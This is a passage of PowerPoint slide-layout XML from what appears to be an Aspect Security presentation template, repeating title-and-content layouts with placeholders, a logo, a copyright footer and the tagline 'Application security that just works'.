          <p:cNvPr id="2" name="Picture 1" descr="AS-powerpoint_background-interior.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546"/>
            <a:ext cx="9144000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="682625" y="1431959"/>
            <a:ext cx="7627560" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="69850">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7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="685800"/>
            <a:ext cx="7626096" cy="612648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="4000" b="1" kern="1200" cap="all" baseline="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit title</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1837944"/>
            <a:ext cx="7626096" cy="4096512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="6350" indent="-6350">
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char=" "/>
              <a:defRPr lang="en-US" sz="3000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="855663" indent="-285750" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2400" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char="‒"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="174689"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="›"/>
              <a:defRPr/>
            </a:lvl4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8" name="Picture 7" descr="Aspect-Security-logo.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658012" y="294400"/>
            <a:ext cx="1670324" cy="417582"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Footer Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6576113"/>
            <a:ext cx="2895600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>©2015 Aspect Security. All Rights Reserved</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6219303" y="6589205"/>
            <a:ext cx="2133600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1867027604"/>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4_Title and Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5773911" y="295363"/>
            <a:ext cx="3178807" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Application security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>that just works</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1" descr="AS-powerpoint_background-interior.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546"/>
            <a:ext cx="9144000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="682625" y="1431959"/>
            <a:ext cx="7627560" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="69850">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7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="685800"/>
            <a:ext cx="7626096" cy="612648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="4000" b="1" kern="1200" cap="all" baseline="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit title</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1837944"/>
            <a:ext cx="7626096" cy="4096512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="6350" indent="-6350">
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char=" "/>
              <a:defRPr lang="en-US" sz="3000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="855663" indent="-285750" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2400" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char="‒"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="174689"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="›"/>
              <a:defRPr/>
            </a:lvl4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8" name="Picture 7" descr="Aspect-Security-logo.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658012" y="294400"/>
            <a:ext cx="1670324" cy="417582"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Footer Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6576113"/>
            <a:ext cx="2895600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>©2015 Aspect Security. All Rights Reserved</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6219303" y="6589205"/>
            <a:ext cx="2133600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1867027604"/>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5_Title and Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5773911" y="295363"/>
            <a:ext cx="3178807" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Application security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>that just works</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1" descr="AS-powerpoint_background-interior.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546"/>
            <a:ext cx="9144000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="682625" y="1431959"/>
            <a:ext cx="7627560" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="69850">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7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="685800"/>
            <a:ext cx="7626096" cy="612648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="4000" b="1" kern="1200" cap="all" baseline="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit title</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1837944"/>
            <a:ext cx="7626096" cy="4096512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="6350" indent="-6350">
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char=" "/>
              <a:defRPr lang="en-US" sz="3000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="855663" indent="-285750" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2400" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char="‒"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="174689"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="›"/>
              <a:defRPr/>
            </a:lvl4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8" name="Picture 7" descr="Aspect-Security-logo.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658012" y="294400"/>
            <a:ext cx="1670324" cy="417582"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Footer Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6576113"/>
            <a:ext cx="2895600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>©2015 Aspect Security. All Rights Reserved</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6219303" y="6589205"/>
            <a:ext cx="2133600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1867027604"/>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6_Title and Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5773911" y="295363"/>
            <a:ext cx="3178807" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Application security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>that just works</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1" descr="AS-powerpoint_background-interior.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546"/>
            <a:ext cx="9144000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="682625" y="1431959"/>
            <a:ext cx="7627560" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="69850">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7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="685800"/>
            <a:ext cx="7626096" cy="612648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
